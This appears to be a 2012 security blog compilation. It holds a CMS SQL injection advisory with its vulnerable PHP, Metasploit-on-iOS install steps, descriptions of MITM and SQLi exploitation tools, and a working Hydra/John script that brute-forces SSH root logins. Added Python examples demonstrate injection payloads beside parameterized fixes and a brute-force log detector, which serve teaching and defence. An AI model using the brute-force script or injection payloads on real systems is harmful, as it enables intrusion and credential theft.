Jun 1, 2012

Simple Web Content Management System SQL Injection

For the full list of vulnerabilities in this advisory, see the Source link at the end of the post.

######################################################################################
# Exploit Title: Simple Web Content Management System SQL Injection
# Date: May 30th 2012
# Author: loneferret
# Version: 1.1
# Application Url: http://www.cms-center.com/
# Tested on: Ubuntu Server 8.04 / PHP Version 5.2.4-2ubuntu5.23
######################################################################################
# Discovered by: loneferret
######################################################################################

# Side note:
# This application is nothing fancy, and really shouldn't be used other than
# for practicing SQLi. Pretty much every page has at least one (1) vulnerable
# parameter.

# Vulnerability:
# Due to improper input sanitization, many parameters are prone to SQL injection.
# Most of them require being authenticated with an (admin) account,
# but a few pages will cause an error without having to log on.


# PoC 1:
# No Authentication Required.
# Page: /admin/item_delete.php?id=[SQLi]
# Vulnerable Parameter: id
# Code:
$id = $_GET['id'];          // taken straight from the query string, no validation
$title = NULL;
$text = NULL;
database_connect();
$query = "select title,text from content where id = $id;";   // $id interpolated into SQL
//echo $query;
$result = mysql_query($query);

# As stated, nothing is checked before passing "id" to MySql.
# This results in a MySql error.



# PoC 2:
# No Authentication Required.
# Page: /admin/item_status.php?id=[SQLi]&status=1
# Page: /admin/item_status.php?id=1&status=[SQLi]
# Vulnerable Parameter: id & status
# Code:
$ref = $_GET['ref'];
$id = $_GET['id'];          // unvalidated
$status = $_GET['status'];  // unvalidated
$update = "UPDATE content
        SET status='$status'
        WHERE id='$id'";    // quoting does not help: a single quote in the value breaks out
$query = mysql_query($update)
    or die("Their was a problem updating the status: ". mysql_error());

# As stated, nothing is checked before passing "id" and/or "status" to MySql.
# This results in a MySql error.
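As an added illustration (not part of the original advisory or of the CMS code), the following Python script reproduces both PoCs against an in-memory SQLite stand-in for the content table and puts each beside a parameterized version. SQLite stands in for MySQL, an f-string plays the role of PHP's double-quoted interpolation, and the table schema (id, title, text, status) and its rows are constructed assumptions derived from the two queries quoted above.

```python
import sqlite3

# Constructed stand-in for the CMS "content" table. The column set (id, title,
# text, status) is assumed from the two queries in the advisory; rows are made up.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE content (id INTEGER PRIMARY KEY, title TEXT, text TEXT, status INTEGER);
        INSERT INTO content VALUES (1, 'Welcome',  'public page',        1);
        INSERT INTO content VALUES (2, 'Draft',    'unpublished secret', 0);
        INSERT INTO content VALUES (3, 'Internal', 'staff only',         0);
    """)
    return conn

def current_status(conn):
    return conn.execute("SELECT id, status FROM content ORDER BY id").fetchall()

# PoC 1 as written in item_delete.php: the id value is spliced into the SQL text,
# so the request parameter becomes part of the query grammar.
def item_lookup_vulnerable(conn, id_param):
    query = f"select title,text from content where id = {id_param}"
    return conn.execute(query).fetchall()

# Hardened form: the value is bound as a parameter, so the driver keeps it data.
# Casting to int additionally rejects anything that is not a plausible id.
def item_lookup_safe(conn, id_param):
    try:
        item_id = int(id_param)
    except (TypeError, ValueError):
        return []
    return conn.execute("select title,text from content where id = ?", (item_id,)).fetchall()

# PoC 2 as written in item_status.php: quoting the interpolated values does not
# help, because a single quote inside the value closes the string literal early.
def item_status_vulnerable(conn, id_param, status_param):
    update = f"UPDATE content SET status='{status_param}' WHERE id='{id_param}'"
    conn.execute(update)
    conn.commit()
    return current_status(conn)

# Hardened form: bound parameters plus an allow-list on status, which the
# advisory's example URLs suggest is a 0/1 flag (assumption).
def item_status_safe(conn, id_param, status_param):
    try:
        item_id, status = int(id_param), int(status_param)
    except (TypeError, ValueError):
        return current_status(conn)
    if status not in (0, 1):
        return current_status(conn)
    conn.execute("UPDATE content SET status = ? WHERE id = ?", (status, item_id))
    conn.commit()
    return current_status(conn)

if __name__ == "__main__":
    db = make_db()
    print(item_lookup_vulnerable(db, "2 or 1=1"))          # every row, not just id 2
    print(item_lookup_safe(db, "2 or 1=1"))                # [] (input rejected)
    print(item_status_vulnerable(db, "1' or '1'='1", "1")) # every row flipped to status 1
    print(item_status_safe(make_db(), "1' or '1'='1", "1"))# table left unchanged
```

The point of the two safe variants is that the fix is not escaping: binding the value as a parameter keeps it out of the query grammar entirely, and the integer cast plus allow-list gives the application a second, independent check on what a request may ask for.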


Source: http://www.exploit-id.com/web-applications/simple-web-content-management-system-1-1-multiple-sql-injection

If you like my blog, Please Donate Me

May 31, 2012

Metasploit 4 on iPhone 4S & iPad 2

# Install basic tools
apt-get update
apt-get dist-upgrade
apt-get install wget subversion

# Download correct version of ruby and dependencies
wget http://ininjas.com/repo/debs/ruby_1.9.2-p180-1-1_iphoneos-arm.deb
wget http://ininjas.com/repo/debs/iconv_1.14-1_iphoneos-arm.deb
wget http://ininjas.com/repo/debs/zlib_1.2.3-1_iphoneos-arm.deb

# Install them
dpkg -i iconv_1.14-1_iphoneos-arm.deb
dpkg -i zlib_1.2.3-1_iphoneos-arm.deb
dpkg -i ruby_1.9.2-p180-1-1_iphoneos-arm.deb

# Delete them
rm -rf *.deb

# Go into /private/var and svn checkout the msf trunk.
# Don't download the MSF tar.gz due to svn client versioning issues
cd /private/var
svn co https://www.metasploit.com/svn/framework3/trunk/ msf3
cd msf3/

# Check that Metasploit is running
ruby msfconsole


Source: https://www.offensive-security.com/offsec/metasploit-4-on-iphone-4s-and-ipad-2/


May 29, 2012

SSLsplit – transparent and scalable SSL/TLS interception

SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections. Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit. SSLsplit terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted. SSLsplit is intended to be useful for network forensics and penetration testing.
SSLsplit supports plain TCP, plain SSL, HTTP and HTTPS connections over both IPv4 and IPv6. For SSL and HTTPS connections, SSLsplit generates and signs forged X509v3 certificates on-the-fly, based on the original server certificate subject DN and subjectAltName extension. SSLsplit fully supports Server Name Indication (SNI) and is able to work with RSA, DSA and ECDSA keys and DHE and ECDHE cipher suites. SSLsplit can also use existing certificates of which the private key is available, instead of generating forged ones. SSLsplit supports NULL-prefix CN certificates and can deny OCSP requests in a generic way.

Source: http://www.roe.ch/SSLsplit



SQLCake - an automatic sql injection exploitation kit

What is sqlcake?

sqlcake is an automatic SQL injection exploitation kit written in Ruby. It's designed for system administration and penetration testing.

sqlcake offers a few useful functions for gathering database information easily via SQL injection.

sqlcake also allows you to bypass magic quotes, dump tables and columns, and gives you the possibility to run an interactive MySQL shell.

sqlcake supports UNION-based stacked queries for very fast processing, and blind injection with logarithmic techniques to save time.


Source: http://sqlcake.sourceforge.net/


May 28, 2012

THC-Hydra password bruteforcing with john the ripper - http://funoverip.net

#!/bin/sh

hydra="/usr/local/bin/hydra"
john="/usr/bin/john"

hydra_module="ssh2"
hydra_host="127.0.0.1"
hydra_port="22"
hydra_nb_task="10"
hydra_all_params="-f -s $hydra_port -t $hydra_nb_task -e ns "

john_sessionfile="$1"
john_all_params="--incremental:Alpha --stdout"
john_time_step=20   # time (seconds) to run john

tmp_passwd="/tmp/pwd1234.tmp"
hydra_logfile="/tmp/hydralog"

if [ "$1" = "" ];then
    echo "Usage: $0 <john session file>"
    exit 1
fi

#for lfile in `ls $loginfiles*`;do

while [ 1 ];do
    # generate some password with john the ripper
    echo; echo "- Start (re)generating passwords with John"
    if [ -e "$john_sessionfile.rec" ];then
        # if session exist, restore it
        $john --restore=$john_sessionfile  > $tmp_passwd &
    else
        # if session not exist yet, create it
        $john $john_all_params --session=$john_sessionfile > $tmp_passwd &
    fi

    # wait $john_time_step seconds, then kill john and start hydra on its output
    echo "- Wait ..."
    sleep $john_time_step
    echo "- Kill john"
    killall john 2>/dev/null 1>/dev/null
    sleep 1

    # start hydra
    echo; echo "- Start hydra"; echo

    rm -f $hydra_logfile
    echo "$hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile"
    $hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile

    # if a valid pair has been found, stop the loop
    if [ "`grep $hydra_module $hydra_logfile | grep -v DATA`" != "" ];then
        echo; echo "FOUND !!"
        grep $hydra_module $hydra_logfile | grep -v DATA
        exit 0
    fi

done
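The script above drives the guessing from the attacking side; as an added example that is not part of the original post, here is the defender's counterpart in Python: a small detector that parses OpenSSH auth-log lines (the sample lines below are constructed, not from a real host), flags a source address once it accumulates a threshold of failed logins inside a sliding time window (hydra's parallel tasks, -t 10 in the script, show up as a burst of failures from one address on many source ports), and records whether an accepted login followed the burst, which is the log-side equivalent of the script's FOUND condition. The threshold and window values are assumptions to be tuned per environment.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample lines in OpenSSH syslog format; host name, addresses and
# PIDs are made up. 10.0.0.5 behaves like a hydra run with several parallel
# tasks; 192.0.2.10 is a legitimate user who mistyped a password twice.
SAMPLE_LOG = """\
May 28 10:00:01 host sshd[1001]: Failed password for root from 10.0.0.5 port 40001 ssh2
May 28 10:00:01 host sshd[1002]: Failed password for root from 10.0.0.5 port 40002 ssh2
May 28 10:00:02 host sshd[1003]: Failed password for root from 10.0.0.5 port 40003 ssh2
May 28 10:00:02 host sshd[1004]: Failed password for root from 10.0.0.5 port 40004 ssh2
May 28 10:00:03 host sshd[1005]: Failed password for root from 10.0.0.5 port 40005 ssh2
May 28 10:00:03 host sshd[1006]: Failed password for root from 10.0.0.5 port 40006 ssh2
May 28 10:00:04 host sshd[1007]: Accepted password for root from 10.0.0.5 port 40007 ssh2
May 28 10:05:00 host sshd[1010]: Failed password for alice from 192.0.2.10 port 51000 ssh2
May 28 10:20:00 host sshd[1011]: Failed password for alice from 192.0.2.10 port 51001 ssh2
May 28 10:20:05 host sshd[1012]: Accepted password for alice from 192.0.2.10 port 51002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port (?P<port>\d+)"
)

def parse(lines):
    """Turn matching sshd lines into (timestamp, result, user, ip, port) tuples."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        # Syslog stamps carry no year; strptime defaults to 1900, which is fine
        # because only differences between timestamps are used.
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["ip"], int(m["port"])))
    return events

def detect_bursts(lines, threshold=5, window_seconds=60):
    """Return {ip: (peak_failures_in_window, distinct_source_ports, accepted_after_burst)}
    for every source address that reaches `threshold` failed logins within any
    sliding window of `window_seconds`."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    ports = defaultdict(set)      # ip -> every source port seen failing
    flagged = {}
    for ts, result, user, ip, port in sorted(parse(lines)):
        if result == "Failed":
            q = recent[ip]
            q.append(ts)
            ports[ip].add(port)
            while (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()   # drop failures that fell out of the window
            if len(q) >= threshold:
                peak = max(flagged.get(ip, (0, 0, False))[0], len(q))
                flagged[ip] = (peak, len(ports[ip]), False)
        elif result == "Accepted" and ip in flagged:
            peak, distinct, _ = flagged[ip]
            flagged[ip] = (peak, distinct, True)   # success after a burst: investigate first
    return flagged

if __name__ == "__main__":
    for ip, (peak, distinct, success) in detect_bursts(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {peak} failures in window, {distinct} source ports, "
              f"accepted login afterwards: {success}")
```

Run as a script it reports only 10.0.0.5. The many distinct source ports in a short window are the signature of a parallel tool rather than a human retyping a password, and a subsequent accepted login from the same address is the finding a responder should act on before anything else.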


Source: http://funoverip.net/2010/12/thc-hydra-password-bruteforcing-with-john-the-ripper/


jasagerpwn - Jasager attack vector script for BackTrack 5 and Ubuntu.

This script assumes you're using BackTrack 4/5 with the tools under /pentest/; if you have them somewhere else, just adjust the variables accordingly.

This can work with normal Ubuntu as well, but keep in mind that setting up the OS will take some more work and general Linux skill.

The following dependencies are required for full functionality of the script.

Dependencies: PHP5, Apache2, INSTALLED Metasploit, Social Engineering Toolkit, Macchanger, Dsniff Suite, DHCP3, INSTALLED SSLstrip, INSTALLED airdrop-ng, Aircrack-ng suite with working injection.



Source: https://code.google.com/p/jasagerpwn/

